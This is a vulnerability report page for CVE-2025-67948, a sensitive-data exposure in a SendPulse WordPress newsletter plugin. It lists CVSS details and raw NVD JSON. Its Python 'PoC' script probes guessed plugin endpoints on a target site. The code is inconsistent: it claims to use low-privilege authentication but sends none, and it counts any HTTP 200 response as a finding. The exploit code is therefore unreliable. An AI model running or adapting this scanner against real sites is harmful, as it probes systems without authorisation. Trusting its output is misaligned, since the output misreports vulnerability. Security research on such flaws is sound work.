Security Vulnerability Report
中文
CVE-2025-67948 CVSS 4.3 MEDIUM

CVE-2025-67948

Published: 2025-12-16 09:15:59
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in SendPulse SendPulse Email Marketing Newsletter sendpulse-email-marketing-newsletter allows Retrieve Embedded Sensitive Data.This issue affects SendPulse Email Marketing Newsletter: from n/a through <= 2.2.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SendPulse Email Marketing Newsletter <= 2.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67948 PoC - SendPulse Email Marketing Newsletter Information Disclosure # Target: WordPress site with SendPulse Email Marketing Newsletter plugin <= 2.2.1 import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-67948 This vulnerability allows low-privileged users to retrieve sensitive data """ # Add WordPress REST API endpoint for the plugin endpoints = [ f"{target_url}/wp-json/wp/v2/sendpulse", f"{target_url}/wp-admin/admin-ajax.php?action=get_sendpulse_data", f"{target_url}/wp-json/sendpulse/v1/config" ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-67948: SendPulse Email Marketing Newsletter <= 2.2.1") print(f"[*] Vulnerability: Sensitive Information Exposure") for endpoint in endpoints: try: print(f"\n[*] Testing endpoint: {endpoint}") # Try with basic authentication (low-privilege user) headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/json' } response = requests.get(endpoint, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Potential sensitive data found at {endpoint}") print(f"[+] Response preview: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {str(e)}") print("\n[-] No vulnerable endpoints found or authentication required") print("[*] Note: This PoC requires a low-privilege WordPress account") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67948", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:59.447", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in SendPulse SendPulse Email Marketing Newsletter sendpulse-email-marketing-newsletter allows Retrieve Embedded Sensitive Data.This issue affects SendPulse Email Marketing Newsletter: from n/a through <= 2.2.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sendpulse-email-marketing-newsletter/vulnerability/wordpress-sendpulse-email-marketing-newsletter-plugin-2-2-1-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}